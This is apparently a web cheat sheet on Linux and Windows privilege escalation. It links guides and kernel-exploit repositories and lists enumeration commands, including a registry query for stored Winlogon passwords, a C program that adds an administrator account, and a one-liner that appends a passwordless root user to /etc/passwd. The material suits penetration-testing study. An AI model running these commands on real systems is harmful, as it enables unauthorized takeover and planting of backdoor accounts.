Welcome to the Privilege Escalation Resources guide! This comprehensive compilation aims to provide you with essential information and tools to understand and address privilege escalation techniques on both Linux and Windows systems. Privilege escalation refers to the process of elevating user privileges to gain unauthorized access to sensitive resources or perform critical actions.
In this guide, we will explore various resources and methodologies to identify potential vulnerabilities and weaknesses in a system, allowing you to escalate privileges and gain deeper access. We will cover websites, tools, code snippets, and techniques commonly used by security professionals to assess and strengthen the security of their systems.
Whether you are a seasoned cybersecurity expert or a curious individual looking to learn more about security practices, this guide offers valuable insights and practical knowledge to enhance your understanding of privilege escalation. Let’s dive into the world of privilege escalation and arm ourselves with the knowledge needed to protect our systems effectively.
- GTFOBins – A collection of Unix binaries that can be used for privilege escalation. Website: https://gtfobins.github.io/
- Linux Privilege Escalation Fundamentals – Comprehensive guide on Linux privilege escalation. Website: https://guif.re/linuxeop
- Windows Privilege Escalation Fundamentals – Detailed resource for Windows privilege escalation. Website: https://guif.re/windowseop
- FuzzySecurity – Windows Privilege Escalation Fundamentals – In-depth tutorial on Windows privilege escalation. Website: http://www.fuzzysecurity.com/tutorials/16.html
- Payatu – Guide to Linux Privilege Escalation – A guide on Linux privilege escalation. Website: https://payatu.com/guide-linux-privilege-escalation
Linux Privilege Escalation Techniques
- Checking sudo privileges (sudo -l)
- Exploiting kernel vulnerabilities (Kernel Exploits)
- Leveraging vulnerabilities in the operating system (OS Exploits)
- Exploiting password reuse in various files (MySQL, .bash_history, 000-default.conf, etc.)
- Identifying binaries with the suid flag and interactive mode (e.g., nmap)
- Exploiting custom binaries with the suid flag, either through other binaries or command execution
- Exploiting writable files owned by root, executed through cron jobs
- Gaining MySQL access as root
- Exploiting vulnerable services like chkrootkit and logrotate
- Gaining access to sensitive files like /etc/passwd and .bash_history
- Obtaining SSH private keys and public keys with a predictable PRNG
- Monitoring listening ports on localhost for potential vulnerabilities
- Checking /etc/fstab, /etc/exports, and /var/mail for exploitable configurations
- Executing processes as other users (root) to modify something you have permissions for
Windows Privilege Escalation Techniques
- Leveraging kernel exploits and OS vulnerabilities (Kernel Exploits, OS Exploits)
- Pass The Hash attack method
- Exploiting password reuse
- DLL hijacking through the PATH
- Exploiting vulnerable services and writable service binaries path
- Identifying unquoted service paths for exploitation
- Monitoring listening ports on localhost for potential vulnerabilities
- Investigating registry keys for exploitable configurations
Kernel Exploits Repositories
- Linux Kernel Exploits: https://github.com/lucyoa/kernel-exploits
- Windows Kernel Exploits: https://github.com/abatchy17/WindowsExploits
Windows Privilege Escalation Guides
- Windows Privilege Escalation Guide: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Sample Windows Code for User Addition:
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main() {
int i;
i = system("net user <username> <password> /add && net localgroup administrators <username> /add");
return 0;
}
Linux Privilege Escalation Techniques
- Finding binaries with the suid, sgid, or sticky bit set:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
- Finding writable files and directories:
find / -writable -type f 2>/dev/null
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
find /etc/ -writable -type f 2>/dev/null
- Identifying SUID/GUID binaries owned by root:
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
Windows Exploit Suggester:
python windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Windows Privilege Escalation Techniques
- Checking registry settings for AlwaysInstallElevated:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Basic Linux Enumeration
- Finding distribution type and kernel version:
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
- Checking default writable directories:
/tmp
/dev/shm
- Searching for passwords in files like config.php:
grep -R 'password' config.php
- Finding other writable directories and folders:
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
- Identifying services running as root user:
ps aux | grep root
ps -ef | grep root
- Listing installed applications and packages:
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives
ls -lah /var/cache/yum/
- Checking scheduled jobs:
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
- Searching for patterns in files:
grep -rnw '/etc/passwd' -e 'root'
Sticky Bit, SGID, SUID, GUID
- Sticky Bit:
find / -perm -1000 -type d 2>/dev/null
- SGID (chmod 2000):
find / -perm -g=s -type f 2>/dev/null
- SUID (chmod 4000):
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
- SUID or GUID:
find / -perm -g=s
-o -perm -u=s -type f 2>/dev/null
Adding a user to /etc/passwd and the root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
Suggest an edit to this article
Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!
Remember, CyberSecurity Starts With You!
- Globally, 30,000 websites are hacked daily.
- 64% of companies worldwide have experienced at least one form of a cyber attack.
- There were 20M breached records in March 2021.
- In 2020, ransomware cases grew by 150%.
- Email is responsible for around 94% of all malware.
- Every 39 seconds, there is a new attack somewhere on the web.
- An average of around 24,000 malicious mobile apps are blocked daily on the internet.